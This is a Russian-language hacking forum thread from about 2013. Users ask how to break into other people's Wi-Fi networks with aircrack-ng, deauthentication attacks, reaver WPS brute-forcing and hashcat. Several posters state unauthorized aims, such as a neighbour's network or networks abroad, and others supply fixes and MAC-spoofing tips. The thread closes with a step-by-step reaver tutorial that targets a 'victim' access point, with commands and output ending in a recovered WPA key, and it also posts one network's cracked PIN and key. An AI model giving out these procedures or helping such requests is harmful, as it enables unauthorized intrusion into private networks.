под "нормальным дампом" я имел ввиду использование airodump-ng. попробуйте настроить "спрятанную" сеть, запустите airodump-ng на запись и подключитесь к ней. потом откройте записанный файл Wireshark-ом и увидите те самые Probe request.

При проведении атаки на WPA точку через aireplay-ng в BT5

aireplay-ng --deauth 5 -a........... -c .......... wlan0

aiireplay-ng попросил ввести дополнительную команду :

--ignore-negative-one или использовать kernel patch.

Без этой команды атаки не проходили.Объясните пожалуйста что за команда --ignore-negative-one и что это за kernel patch?

gpuhash, airodump сканирует в диапазоне Wi-Fi все Probe request пакеты которые долбятся к точкам ? я правильно понял? спасибо .

Подскажите пожалуйста от чего зависит скорость перебора паролей?

Я перебираю пароли на Hashcat с HDD WD 5200 об/мин. и видеокарта c чипом Radeon 5570, у меня скорость 17'300 c/s.

Если я поставлю SSD будет ли прирост скорости?

Заранее спасибо)

Помогите пожалуйста, когда пишу airmon-ng start wlan0 (у меня нет usb передатчика, использую встроенный) выдает такое:


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time,
you may want to kill (some of) them!

PID Name
3939 dhclient3
3945 dhclient3
Process with PID 3945 (dhclient3) is running on interface wlan0

Interface chipset Driver

И, вроде как, предлагается что-то ввести. Использую BT5R3. Что делать?

Результат - 392.000 паролей в секунду! И это очень хорошо согласуется с теоретической предполагаемой скоростью, исходя из конфигурации системы.


Какое же это масштабирование, если ты запряг 4 штуки 6900 и ещё 5800?

Нормальный результат будет 165000*4 + ещё сколько-то.

Надеюсь на прояснение, заранее спасибо.

Помогите пожалуйста, когда пишу
airmon-ng start wlan0
(у меня нет usb передатчика, использую встроенный) выдает такое:

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time,
you may want to kill (some of) them!

PID Name
3939 dhclient3
3945 dhclient3
Process with PID 3945 (dhclient3) is running on interface wlan0

Interface chipset Driver

И, вроде как, предлагается что-то ввести. Использую BT5R3. Что делать?


Ничего не делать пока. Тебе сообщается что два процесса могут помешать удачной работе aircrack. Если увидишь что прога нестабильно работает, жми

kill 3945

Какое же это масштабирование, если ты запряг 4 штуки 6900 и ещё 5800?
Нормальный результат будет 165000*4 + ещё сколько-то.
Надеюсь на прояснение, заранее спасибо.


Было запряжено две 6990 и одна 5870 (6990 двухчиповая карта поэтому системой определяется как 2 отдельных GPU).

Масштабируется вполне приемлемо.

Однако следует учитывать что будет некоторое снижение суммарного результата если смешивать GPU разных поколений в одной системе, что кстати и происходит в данном примере. Ведь если посчитать скорости карт по отдельности и сложить получится 420-430К. Связано это со сложностью синхронизации из-за различия архитектуры GPU, поэтому кто-то из них всегда имеет большее значение IDLE..

Помогите разобраться. В линуксе новичек Хендшейк есть , но не могу прописать путь к словарю. BT запускаю с usb а словарь на жёстком диске на ноуте (винда). Как быть?

Такие дела:

Пишу хендшейк, но я не знаю как остановить этот процесс, при закрытии терминала этот процесс закрывается. В итоге на флешке нету файла .cap. Если во время записи ввести aircrack-ng testcap, пишет "open failed: no such file or directory".

Если писать aireplay-ng для деассоциации, выводит "Couldn't determine current channel for wlan1, you should either force the operation with --ignore-negative-one or apply a kernel patch. Please specify an ESSID (-e)"

че делать

Возможно ли через виртуальную машину перехватывать пакеты? Я установил на VM BT5 , адаптер, однако, имеет дрова только под винду и сеть настроена на винде. Ессно при запуске BT5 на виртуалке, линуха не видет "no wireless extensions". Если какие то костыли?

P.S. Да я люблю извращения.

Подскажите пожалуйста.,для взламывания wi-fi достаточно иметь такие устройства: комп-пентиум-4,видюха gforce-ti4200 ,оперативка-500мбайт,атапер d-link dwa-131.

Мой адаптер в данной с ним прогой ловит и показывает wi-fi связи, но какие для этого мне нужно еще устройства приобрести и программы?чтобы взломать эти точки вай фая.

Такие дела:
Пишу хендшейк, но я не знаю как остановить этот процесс, при закрытии терминала этот процесс закрывается. В итоге на флешке нету файла .cap.


Присоединяюсь к вопросу. Как сохранить пойманные хендшеки?

вариант №2 качаем сбору /thread351633.html (https://antichat.live/threads/351633/) - описание ,видео .

очень просто и без оффтопа ,главное быстро и без лишних вопросов , в теме 2 видео смотрим повторяем .!

"запись файла с пакетами необходимо вести на внешнюю флешку"

покажи на примере как примонтировать флеху правильно ....

при условии что я гружу BT5 с той же флехи... я не понял (

Протестировал WIFI

Всем привет.

Я решил "протестировать" WIFI на безопасность

Читал этот топ, скачал Wifi slax 4.2, закатал на болванку.

Включил с нее программу, не помню как называется, видео смотрел тут (http://www.youtube.com/watch?v=Yf2sz28dJxI) .

Оставил на ночь, утром гляжу, на 93% оно закончило работу.

Выдает:

WPS Pin: 8 цифер (это я так понимаю тот самый пин, который печатают на коробке, состоит из двух частей, при подборе 11000 вариантов или че-то там).

WPA PSK: 8 цифер собсно ключ который я вводил в винде при попытке подключиться к искомой точке.

AP SSID такое-то имя этой самой сети

AP MAC **:**:**:**:**:** МАК адрес который я с помощью еще airdump из набора Wifi slax 4.2 вписал себе. Вбивалв строку Fake MAC

Кароче не конектиться и все (( Пишет "не удоется до конца подсоедениться к сети" тормозит на обновлении IP адреса.

У меня Aspire One, карта Atheros.

Искомая сеть - WPA.

Подозреваю что это может происходить т.к. токой МАК к точке уже подрублен.

Или из-за того что сигнал маленький (в винде показывает 1 палку или 2.

Выслушаю ваши соображения, в том числе и в личку.

Заранее спасибо за развернутые ответы.

WPA PSK: 8 цифер собсно ключ который я вводил в винде при попытке подключиться к искомой точке.


Вам крупно повезло - вы взломали WPS


AP SSID такое-то имя этой самой сети
AP MAC **:**:**:**:**:** МАК адрес который я с помощью еще airdump из набора Wifi slax 4.2 вписал себе. Вбивалв строку Fake MAC


AP MAC - это MAC адрес точки доступа. В поле Fake MAC нужно ставить любой другой мак адрес (первый байт ставьте 00 не ошибетесь), но никак не адрес точки доступа. Поэтому и не конектится.

"запись файла с пакетами необходимо вести на внешнюю флешку"
покажи на примере как примонтировать флеху правильно ....
при условии что я гружу BT5 с той же флехи... я не понял (


лучше еще одну чистую (отформатированную) вставить, проще всего, ВТ ее автоматом должен подцепить.

чуть позже попробую сделать отчет как писать на ту же флешку с которой грузишься, не пробовал если честно ни разу, т.к. поставил ВТ на HDD и не парюсь

Здравствуйте. Может этот вопрос обсуждался в форуме но я не нашел. Хочу взломать wifi соседа. Я знаю что пароль 8-значный и состоит только из цифр, без букв. Какой программой можно подобрать пароль под windows, чтобы еще содержал словарь для 8-значнного пароля? Я установил Elcomsoft Wireless Security Auditor и hashcat-plus, но оба требуют хендшейк, а скачать BackTrack для этого и др. большие программы я не могу, у меня очень низкая скорость интернета. Поэтому я прошу скажите есть ли маленькая программа для подбора пароля, пусть и без GPU ускорения. Спасибо.

cudaHashcat-plus v0.07 by atom starting...

Hashes: 1

Unique salts: 1

Unique digests: 1

Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes

Rules: 1

GPU-Loops: 64

GPU-Accel: 1

Password lengths range: 8 - 15

Platform: NVidia compatible platform found

Watchdog: Temperature limit set to 90c

Device #1: GeForce GT 650M, 2048MB, 950Mhz, 2MCU

Device #1: Allocating 0MB host-memory

ERROR: ERROR: cuModuleLoad() 301

D:\***\hashcat-gui-0.5.1\oclHashcat-plus>

Помогите, на буке хешкот вот такое выдает.

cudaHashcat-plus v0.07 by atom starting...
Hashes: 1
Unique salts: 1
Unique digests: 1
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Rules: 1
GPU-Loops: 64
GPU-Accel: 1
Password lengths range: 8 - 15
Platform: NVidia compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: GeForce GT 650M, 2048MB, 950Mhz, 2MCU
Device #1: Allocating 0MB host-memory
ERROR: ERROR: cuModuleLoad() 301
D:\***\hashcat-gui-0.5.1\oclHashcat-plus>
Помогите, на буке хешкот вот такое выдает.


Ошибка из за кривого архива программы.

Скачайте и переустановите Hashcat по новой . Так, по крайней мере, советуют на форуме Хэшкэта: тык. (http://hashcat.net/forum/thread-531.html)

На буке

Intel Quad-core i5-3210M 2.5 GHz, L3 3 Mb

NVidia GeForce GT 650M

в hashcat скорость 6k

На компе

AMD Phenom 9550 Quad-core 2.2 GHz, L3 2 Mb

NVidia GeForce

в hashcat тоже 6k!

Как так? Почему так мало? Неужто плохие характеристики?

Кстати, еще че такое accel и loops в hashcat?

доброго времени суток. помогите разобраться, подобрал пароль к точке с wep шифрованием , но при входе инет появляется на несколько секунд , а потом : сеть без выхода в интернет . в чём проблема? нужны какие то дополнительные настройки на компе ? заранее благодарен за ответ.

доброго времени суток. помогите разобраться, подобрал пароль к точке с wep шифрованием
, но при входе инет появляется на несколько секунд , а потом : сеть без выхода в интернет
. в чём проблема? нужны какие то дополнительные настройки на компе ? заранее благодарен за ответ.


Возможна контроль мак адреса, как дополнительная стразовка на рутере.

Возможна контроль мак адреса, как дополнительная стразовка на рутере.



спасибо за ответ. попробую со сменой мака

помогите пожалуйста!вожу команду:besside-ng mon0

пишет так:

root@bt:~# besside-ng mon0

Команда 'besside-ng' не найдена, возможно вы имели в виду:

Команда 'wesside-ng' из пакета 'aircrack-ng' (universe)

besside-ng: команда не найдена

расталкуйте я что то не разберусь!

помогите пожалуйста!вожу команду:besside-ng mon0
пишет так:
root@bt:~# besside-ng mon0
Команда 'besside-ng' не найдена, возможно вы имели в виду:
Команда 'wesside-ng' из пакета 'aircrack-ng' (universe)
besside-ng: команда не найдена
расталкуйте я что то не разберусь!


в установленной версии пакета aircrack-ng отсутствует besside-ng (видимо у вас старый aircrack).

можете попробовать собрать aircrack-ng из svn:

svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng

make

sudo make install

Сигнатура проблемы:

Имя события проблемы: APPCRASH

Имя приложения: oclHashcat-plus64.exe

Версия приложения: 0.0.0.0

Отметка времени приложения: 4efe51f4

Имя модуля с ошибкой: amdocl64.dll

Версия модуля с ошибкой: 10.0.1084.2

Отметка времени модуля с ошибкой: 50a16014

Код исключения: c0000005

Смещение исключения: 00000000010821c0

Версия ОС: 6.1.7601.2.1.0.256.1

Код языка: 1049

Дополнительные сведения 1: 6c8d

Дополнительные сведения 2: 6c8d82693732bcb4e6ed85d01f8339ae

Дополнительные сведения 3: 80c1

Дополнительные сведения 4: 80c11de909ac969b6b78398da6b1175b

и что блин делать? как только стартую хеш кет вылазит окно закрыть программу и этот код.

Почему-то проблема с запуском. Качнул hashcat-gui-0.5.1, запускаю гуй, пишет: Приложение или библиотека MSVCR100.dll не является образом программы для Windows NT. Качнул эту длл, закинул в папку хашката, в Windows - всё равно то же самое ;( WinXPSP3, Win7SP1.


Такая же проблема! Не могу запустить ГУИ!!! Люди подскажите в чем дело? Win XP sp 3 так же....

Вообше фак бы по hashcat под вин немешало....

Заранее спасибо за ответы!

Тебе нужно либо директ иск либо Microsoft Visual C++ 2010 Redistributable Package

либо Net Framework

либо уйти наконец с этой Хрюши. У меня проблема с видеокартой или дровами хотя странно радеон 7900 и куча времени свободного, людям бы помогал шейки брутил так нет ошибка

Вообше подскажите какая будет производительность на нвидиа g210? Стоит ли морочаться?

Отличная статья, ждем продолжения от автора.

А если нету в словаре пароля. Какие способы еще есть?

А если нету в словаре пароля. Какие способы еще есть?


Лучший способ - наловить хендшейков других сетей, при хороших словарях статистика успешного исхода более 30%, так что в среднем по больнице каждая третья сеть уязвима.

Если нужна именно ЭТА сеть, здесь нужно пробовать все варианты. Частичный брут-форс (полный хотя бы из 8 символов к сожалению пока недоступен для WPA, не говоря уже о большей длине пароля), атака на WPS, подставная точка и т.д. Ну и надо тщательно работать над словарями

Всем доброго времени суток.

Я первый раз на форyме, прочитал конечно правила, но всё же не уверен в правильном ли месте задаю вопрос. Прошу извинить на первый раз если что не так.

Я как обычно ривером подбираю пароль в новой сети с шифрованием WPA2. Пара - тройка часов и пин у меня. Но вот странность ESSID и AP SSID разные. И пароль подозрительно длинный.

Я сохранил пин, пск и ap ssid. Загрузил семерку, пробую пароль, он не подходит.

Я снова запустил бэктрэк ввел уже сохраненный ранее пин и вижу что пароль изменился! Длинна пароля та же. Ввожу пин снова, и снова пароль другой. И так каждый раз когда я ривером ввожу пин. Подскажите как быть в этом случае?

100.00% complete @ 2013-02-12 16:44:26 (5 seconds/pin) (ESSID ivanushka)

[+] WPS PIN: '19652689'

[+] WPA PSK: '243FE9A5BB5F1AF9E7C352F7169C08A5260A266B9425EB641 FC752574FD25213'

[+] AP SSID: 'Network-d85d4cf04e18'

Всем доброго времени суток.
Я первый раз на форyме, прочитал конечно правила, но всё же не уверен в правильном ли месте задаю вопрос. Прошу извинить на первый раз если что не так.
Я как обычно ривером подбираю пароль в новой сети с шифрованием WPA2. Пара - тройка часов и пин у меня. Но вот странность ESSID и AP SSID разные. И пароль подозрительно длинный.
Я сохранил пин, пск и ap ssid. Загрузил семерку, пробую пароль, он не подходит.
Я снова запустил бэктрэк ввел уже сохраненный ранее пин и вижу что пароль изменился! Длинна пароля та же. Ввожу пин снова, и снова пароль другой. И так каждый раз когда я ривером ввожу пин. Подскажите как быть в этом случае?
100.00% complete @ 2013-02-12 16:44:26 (5 seconds/pin) (ESSID ivanushka)
[+] WPS PIN: '19652689'
[+] WPA PSK: '243FE9A5BB5F1AF9E7C352F7169C08A5260A266B9425EB641 FC752574FD25213'
[+] AP SSID: 'Network-d85d4cf04e18'


Подключайтесь к wi-fi непосредственно по Pin.

Подключайтесь к wi-fi непосредственно по Pin.


Не совсем понял как это сделать в Windows7. И не понимаю почему ESSID - ivanushka а AP SSID - Network-d85d4cf04e18.

Нужно в ручную создавать профиль этой сети в Windows ?

Можно пожалуйста по-подробнее ?

Доброе время суток всем появилась проблема с подбором пароля к " не своему" WiFi-ю. Где я сейчас нахожусь, практически в каждом доме стоят практически одинаковые роутеры, на них наклейка с паролем типа: "2Wf8tY61YhQu9k" и т.д. В разнобой цифры и буквы. Уже несколько суток пляшу с бубном вокрук ноута, со словарями и aircrack-ng. Как и через что подобрать такой пароль? Заранее огромное спасибо)

Не совсем понял как это сделать в Windows7. И не понимаю почему ESSID - ivanushka а AP SSID - Network-d85d4cf04e18.
Нужно в ручную создавать профиль этой сети в Windows ?
Можно пожалуйста по-подробнее ?


Читаем тут, например: /showpost.php?p=3421363&postcount=5352

По пользованию WPS и reaver есть отдельная тема: /thread310835.html

Читаем тут, например: /showpost.php?p=3421363&postcount=5352
По пользованию WPS и reaver есть отдельная тема: /thread310835.html


Я извиняюсь, а можно подробное описание действий?

Я не могу понять куда я могу ввести пин от раутера.

То есть дело в том, что на самом деле пароль другой или?

Читаем тут, например: /showpost.php?p=3421363&postcount=5352
По пользованию WPS и reaver есть отдельная тема: /thread310835.html


Я подключился по пину и зашёл на 192.168.1.1. Пароль был админ админ. А что дальше?

Такая же проблема! Не могу запустить ГУИ!!! Люди подскажите в чем дело? Win XP sp 3 так же....
Вообше фак бы по hashcat под вин немешало....
Заранее спасибо за ответы!


Скачайте и установите программу DLL-Files-Fixer-2.7.72.2072.

В след. окне впишите dll - который вам надо, загрузите и установите.

Запускаем GUI и все.

Удачи всем.

Всем здравствуйте вот вопросик такой есть точка dir-300nru защита wpa-psk как по вайфай выползти в интерфейс точки или ломануть её пароль имея ноутбук с win 7 точка в хорошем доступе. Или без линукса никуда ?

Всем здравствуйте вот вопросик такой есть точка dir-300nru защита wpa-psk как по вайфай выползти в интерфейс точки или ломануть её пароль имея ноутбук с win 7 точка в хорошем доступе. Или без линукса никуда ?


Воспользуйтесь старыми методами, но лучше и эффективнее - BackTrack.

Воспользуйтесь старыми методами, но лучше и эффективнее - BackTrack.


Спасибо сейчас буду разбираться

Доброго времени суток, подскажите что не так, скачал последние версии hashcat gui и ocHashcat, но при запуске ocHashcat через gui не происходит ничего

Всех приветствую ребята подскажите такую деталь:

запустил besside-ng в bt5 все прошло на ура наловил кучу хандшайков от разных сей!!

при попытке брута при помощи hashcat крякает одну сеть о встает!! как работать с другими хандшейками в этом файле ?? или надо отдельно получать их от определенной сети ??? за ранее спс,,,,,,,,,,

Извеняюсь за флуд иеще такой вопросик:

как при помощи aircrack-ng конвертировать .cap в .hccap ?

делал так: aircrack-ng wpa.cap -j wpa.hccap

выдает ошибку (( подскажите что не правильно делаю ??

Подскажите кто знает,пошагово так как я в этом деле новичек

почему то в самом начале выдает

что не обнаружено вайфай адаптеров хотя он должен показывать внутренний адаптер он включен драйвера обновлены и сам он работает испрано так как я сижу с него в интернете,в чем проблема

Извеняюсь за флуд иеще такой вопросик:
как при помощи aircrack-ng конвертировать .cap в .hccap ?
делал так: aircrack-ng wpa.cap -j wpa.hccap
выдает ошибку (( подскажите что не правильно делаю ??


на сайте хэшкэта есть онлайн конвертер *.cap в *.hccap

спс за ответ тему читвл вкурсе нужна именно эта операция!!!

hashcat не умеет парсить EAPOL-хендшейки (вообще никак), и требует от вас выложить ему “на блюдечке” WPA-хеши в его собственном формате *.hccap. Преобразовать обычный *.cap в *.hccap можно с помощью патченой утилиты aircrack-ng, но не загружать же BT опять ради такой мелочи! К нашей всеобщей радости разработчик hashcat сделал удобный онлайн-конвертер

При отсутствии интернета онлайн-конвертером не воспользуешься, пожалуйста, расскажите как для этого использовать aircrack-ng

Всем бобра)

Давно хотел узнать, сеть с WEP шифрованием долго взламывается? Есть ли какие еще способы взлома WEP, кроме BackTrack?

При отсутствии интернета онлайн-конвертером не воспользуешься, пожалуйста, расскажите как для этого использовать aircrack-ng


Посмотри в помощи: aircrack-ng -h

Увидишь весь список атрибутов

http://i53.fastpic.ru/thumb/2013/0304/11/dda3d4d9cf335d0a4037aed67db55b11.jpeg (http://fastpic.ru/view/53/2013/0304/dda3d4d9cf335d0a4037aed67db55b11.png.html)

После последней строчки перестает работать besside-ng, не могу понять почему.

Ещё такой вопрос: можно ли как-нибудь залочить один роутер, чтобы его не атаковал besside-ng?

Хелп смотрел по команде? besside-ng -h

Показывает параметры, точно не помню, но должно быть

Посмотри в помощи: aircrack-ng -h
Увидишь весь список атрибутов


Присоединяюсь к вопросу! Ни как не могу разобратся как конвертировать .cap в .hccap в оффлайне!

Обьясните кто нибудь чайнику!

А как вы вообще на форуме то оказались?)) Если нет доступа?

Ладно, будет время, загружу ВТ и посмотрю

А как вы вообще на форуме то оказались?)) Если нет доступа?


Доступ к нету? Он то есть

я интересуюсь на будущее! очень часто бываю в западной европе, и что бы подрезать wi-fi там доступа к онлайн конвертору нет! а перебирать в ВТ чот совсем не прёт!

EWSA незарегистрированная перебирает еще куда ни шло, а вот скачал уже крякнутую так та вообще тормозит жутко! 8 значный цифровой словарик берет за 10-15 минут

вот и остается выбор за hashcat!

а в ВТ новичек совсем сижу- туплю!!!

Всем бобра)
Давно хотел узнать, сеть с WEP шифрованием долго взламывается? Есть ли какие еще способы взлома WEP, кроме BackTrack?


Присоеденяюсь к вопросу насколько wep легче ломается чем wpa2.

А как вы вообще на форуме то оказались?)) Если нет доступа?
Ладно, будет время, загружу ВТ и посмотрю


Дружище посмотри не в западло !!! aircrack-ng -h ничего не дал((( по крайней мере я ничего похожего для конвертации не увидел !!! Вот такая статейка есть там об этом упоминается но все равно нифига не получается !!! http://appendagesalfredh.blogspot.com/2013/02/wpa2-wifi.html?showComment=1362150886198#c2251152280342 970091

Немного порывшись в инете и почитав разные статейки и форумы я

понял что для конвертации *.cap в *.hccap с помощью aircrack-ng нужен патч для нее же!!! Теперь возник вопрос где взять патч и как пропатчить aircrack-ng??? Как писал sallity81 я тоже очень часто бываю за границей в силу своей работы и этот вопрос очень важен!!! Ребята помогите с этим кто вкурсе !!! за ранее респект и уважуха !!!

Кароче чуваки всем спс разобрался смотрим сюда http://om-sainath.blogspot.com/2012_02_01_archive.html

Для тех кому влом возиться с брутом или слабый пк

Взлом без брута (http://blogzadrota.ru/%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC-wi-fi-wpa2-psk-%D0%B7%D0%B0-%D1%81%D1%83%D1%82%D0%BA%D0%B8-%D0%B8%D0%BB%D0%B8-%D0%B2%D0%B7%D0%BB%D0%BE%D0%BC-wps/)

Кароче чуваки всем спс разобрался смотрим сюда http://om-sainath.blogspot.com/2012_02_01_archive.html


пипец!!!!!

вообще приплыли - ни чего не понятно!

напишите кто нибудь что конкретно нужно набрать в BT ????

пипец!!!!!
вообще приплыли - ни чего не понятно!
напишите кто нибудь что конкретно нужно набрать в BT ????


Переведи и все поймешь !!! гугл хром тебе в помощь для перевода

sallity81 грош цена таким крикунам как ты, куча видео на ютубе, забалвань пару дисков Xiaopan или Wifislax их же вбей в поисковик, и не надо ничего прописывать, бектрек для шарящих, я пока без него обхожусь и наломал кучу сетей. Больше изучай, меньше возмущайся.

sallity81 грош цена таким крикунам как ты,


ну наверно начнем с того что я не возмущался а попросил помочь разобратся!

а если конкретно - то вопрос был к тем форумчанам которым есть что ответить на поставленный вопрос!

и на будущее я бы не советывал вам определять кому-то цену! Грош или рубль мне - судить не вам!

как показывает практика -загибает пальцы не специалист в конкретной области, а самый обычный ...! Познавший в лучшем случае азы......

sallity81 грош цена таким крикунам как ты, куча видео на ютубе, забалвань пару дисков Xiaopan или Wifislax их же вбей в поисковик, и не надо ничего прописывать, бектрек для шарящих, я пока без него обхожусь и наломал кучу сетей. Больше изучай, меньше возмущайся.


Тут я согласен я вон 3 сетки взломал на каждую и 5 часов не ушло и возьни меньше.

Тут я согласен я вон 3 сетки взломал на каждую и 5 часов не ушло и возни меньше.


Тут уже кому как повезет, все решает интеллект человека, придумавшего пароль

Немного порывшись в инете и почитав разные статейки и форумы я
понял что для конвертации *.cap в *.hccap с помощью aircrack-ng нужен патч для нее же!!!


Новый ВТ вроде бы уже патченный... Разве нет?

В общем, вот:

aircrack-ng

options:

-l -- имя файла, куда пишется ключ

-w -- имя файла словаря

-J -- имя файла для записи CAP Hashcat

besside-ng

options:

-s -- загрузка wpa.cap для взлома

Подобрать нужную комбинацию и проверить работоспособность не имею возможности (нет вафли по соседству). Пробуйте)

Если что, у меня ВТ 5.3rc

Тут уже кому как повезет, все решает интеллект человека, придумавшего пароль


пароль gir147naltrexon

Как взламывал я ранее писал на форуме, перед сном поставил утром получил результат. и никакой возни с хашкэтом всё сделал бт буквально в 3 шага с ноутбука. И плюс всего этого что пакеты с этими плюшками для взлома при желании можно даже на телефон с андроидом поставить. Сейчас вычисляю насколько это возможно. И сколько уйдёт времени на это телефону.

....

привет всем!!! есть такая проблема, есть одна вай фай сеть без пароля,но когда подключаюсь к ней открывается какая-то страница и требует логин и пароль, без них интернет не используешь, как называется эта защита и возможно её взломать??

mikaelo, я тоже не пользовался ничем, кроме ВТ. Брутил через него. Только результата не добился

Дай пожалуйста ссылочку на


Как взламывал я ранее писал на форуме

1. Берем ноутбук с встроенным Wifi модулем.

2. CDR болванку

3. пишем любую из этих сборок http://www.downloadwireless.net/?dir=isos-fase-testing/wifislax-current формат ISO пишется НЕро или Ultra ISO

4. грузимся с диска выбираем VESA MODE

4. смотрим и повторяем как в видео.

http://www.youtube.com/watch?v=Yf2sz28dJxI

http://www.youtube.com/watch?v=mZLKbHmutBg

ну и смотрим похожие видео, что да как. Даже методом тыка можно

uzlob, а что это?

ВитаминКО это наверное как хакнуть вайфай не прописывая ни одной команды

paulo, такое возможно?

paulo
, такое возможно?


я думаю возможно, взлом можно осуществить запустив Inflator из сборок Wifislax Xiaopan. У меня 3 соседа, у всех включен WPS, у всех Zyxel Keenetic. Время, терпение, ожидание и пароль в кармане. Причём все манипуляции лишь в Inflator и лишь мышкой.

Всем привет. Такой вопрос: запускаю на ноуте ВТ, запускаю утилиту wash -i, и встроенный wi-fi адаптер видит сеть с включенным wps, подключаю к ноуту внешний wi-fi адаптер TP-Link TL-WN7200ND, запускаю wash -i и сети с wps уже нету. В чем может быть причина? (встроенный адаптер -14db, а TP-Link TL-WN7200ND -20db)

1. Берем ноутбук с встроенным Wifi модулем.
2. CDR болванку
3. пишем любую из этих сборок http://www.downloadwireless.net/?dir=isos-fase-testing/wifislax-current формат ISO пишется НЕро или Ultra ISO
4. грузимся с диска выбираем VESA MODE
4. смотрим и повторяем как в видео.
http://www.youtube.com/watch?v=Yf2sz28dJxI
http://www.youtube.com/watch?v=mZLKbHmutBg
ну и смотрим похожие видео, что да как. Даже методом тыка можно


Образ скачал wifislax-4.4-beta5.iso от 11 марта , так же пробовал wifislax-4.4-beta4.iso

Что делаю не так, вторые сутки одна и таже картина и проценты не продвигаются никак ?

http://i2.imageban.ru/out/2013/03/14/b543cda596c76bfa9f21781af547cd04.png (http://i2.imageban.ru/out/2013/03/14/b8a9a4f8eb5a51b194375aeedfdc091d.jpg) http://i5.imageban.ru/out/2013/03/14/0fbcc3c9c15f22b629df391d373486c3.png (http://i5.imageban.ru/out/2013/03/14/e0e27b94100025598cead5b5ecf560f8.jpg) http://i1.imageban.ru/out/2013/03/14/ae736538c412812a9881c186e23a3b1d.png (http://i1.imageban.ru/out/2013/03/14/88f13b402ef83d2782df2362d673b044.jpg) http://i2.imageban.ru/out/2013/03/14/416cdf789685afeee9dc900de0cecec1.png (http://i1.imageban.ru/out/2013/03/14/6ef5b9214e1fedd598158eb443dac3e7.jpg)

Изображения по больше ))) не видно нифига

Изображения по больше ))) не видно нифига


Так кликни по картинке она и откроется

Очень познавательно,узнал то что раньше не знал,надо бы на практике попробывать.

Блин начинаю задумываться о видеомануале на эту тему. Правда больше чем на минуту оно не вытянет ))

подскажите пожалуйсто хорошую прогу для вздома wifi для windows 7?

Образ скачал wifislax-4.4-beta5.iso от 11 марта , так же пробовал wifislax-4.4-beta4.iso
Что делаю не так, вторые сутки одна и таже картина и проценты не продвигаются никак ?
http://i2.imageban.ru/out/2013/03/14/b543cda596c76bfa9f21781af547cd04.png (http://i2.imageban.ru/out/2013/03/14/b8a9a4f8eb5a51b194375aeedfdc091d.jpg)
http://i5.imageban.ru/out/2013/03/14/0fbcc3c9c15f22b629df391d373486c3.png (http://i5.imageban.ru/out/2013/03/14/e0e27b94100025598cead5b5ecf560f8.jpg)
http://i1.imageban.ru/out/2013/03/14/ae736538c412812a9881c186e23a3b1d.png (http://i1.imageban.ru/out/2013/03/14/88f13b402ef83d2782df2362d673b044.jpg)
http://i2.imageban.ru/out/2013/03/14/416cdf789685afeee9dc900de0cecec1.png (http://i1.imageban.ru/out/2013/03/14/6ef5b9214e1fedd598158eb443dac3e7.jpg)



Столько отписали и не одного дельного поста

Я знаю что времени у многих не хватает, в том числе и у меня, а гугл ничего путного увы не выдает ...

Просьба, ткните носом что не так делаю ?

По всем признакам большая дистанция до точки .

Попробуй чего то по ближе -49 сигнал это слабо !!!

Все описанное будем проделывать в Ubuntu, либо можно использвать дистрибутив Back track 5 (http://rutracker.org/forum/viewtopic.php?t=4153616) , в репозиториях которого уже есть нужный софт. А для Ubuntu подключить репозитории BackTrack:

Для Ubuntu. ​$ sudo gedit /etc/apt/sources.list

Добавим в конец файла следующее:

# Repository Backtrack

deb http://all.repository.backtrack-linux.org

deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing

deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing

deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Экспортируем ключ безопастности репозитория:

$ wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

И обновим списки пакетов:

$ sudo apt-get update

Ставим пакеты:

$ sudo apt-get install aircrack-ng reaver.

Для windows ​

Качаем дистрибутив Back track 5 (http://rutracker.org/forum/viewtopic.php?t=4153616). Если не знаем что такое торрент то взломать точно не выйдет)).

Находим флешку от 8 гб или dvd-r или rw диск.

Для записи флешки нам понадобиться програмка

Uniwersal USB Instaler (http://www.pendrivelinux.com/downloads/Universal-USB-Installer/Universal-USB-Installer-1.9.3.0.exe)

Скачиваем, запускаем

Выбераем Backtrack 5 r3

Вставляем наш образ.

Выбераем нашу флешку.

Нажимаем Create.

Ждем окончания процесса. Готово.

На диск записать можно даже стандартным прожигом оброзов от windows в 7.

Не буду вдаваться в подробности.

Перезагружаем и выбераем запуск с носителя где записан Backtrack

Ждем пока всё не прогрузиться если загрузка в какой то момент встала. Пишем startx.

После загрузки рабочего стола открываем консоль.

Взлом WPS:

Так как взломать Wi-Fi сеть WPA2-PSK ?

Переведем нашу карту в monitor mode


$ sudo airmon-ng start wlan0

Должно быть примерное так:


Interface Chipset Driver wlan0 Ralink 2561 PCI rt61pci - [phy0] (monitor mode enabled on mon0)

Теперь найдем жертву


$ sudo airodump-ng mon0

Будет список доступных сетей:

Остоновить поиск Ctrl+c


CH 5 ][ Elapsed: 12 s ][ 2012-05-17 16:45 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 1C:BD:B9:B5:C6:B9 -58 6 0 0 2 54 WPA2 TKIP PSK iformula.ru 193.240 BSSID STATION PWR Rate Lost Packets Probes

Проверим, включен ли WPS на точке


$ sudo wash -i mon0

Начинаем перебор:


$ sudo reaver -i mon0 -b 1C:BD:B9:B5:C6:B9 -a -vv

Где mon0 - имя виртуального интерфейса, далее мак адресс точки. -а - автоматически определять параметры взлома. -vv - диагностические сообщения

В результате пошел перебор пинов:

Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com

[+] Waiting for beacon from 1C:BD:B9:B5:C6:B9

[+] Switching mon0 to channel 1

[+] Switching mon0 to channel 2

[+] Associated with 1C:BD:B9:B5:C6:B9 (ESSID: iformula.ru 193.240)

[+] Trying pin 12345670

В конечном итоге :

[+] WPS PIN: '80369424'

[+] WPA PSK: 'TryT0H4CkMe'

[+] AP SSID: 'iformula.ru 193.240'

видим как взлом Wi-Fi сети WPA2 успешно заверен.

Особо любознательные могут усовершенствовать перебор и сократить его время, изучив все возможности reaver:

$ reaver -h

Возможные проблемы:

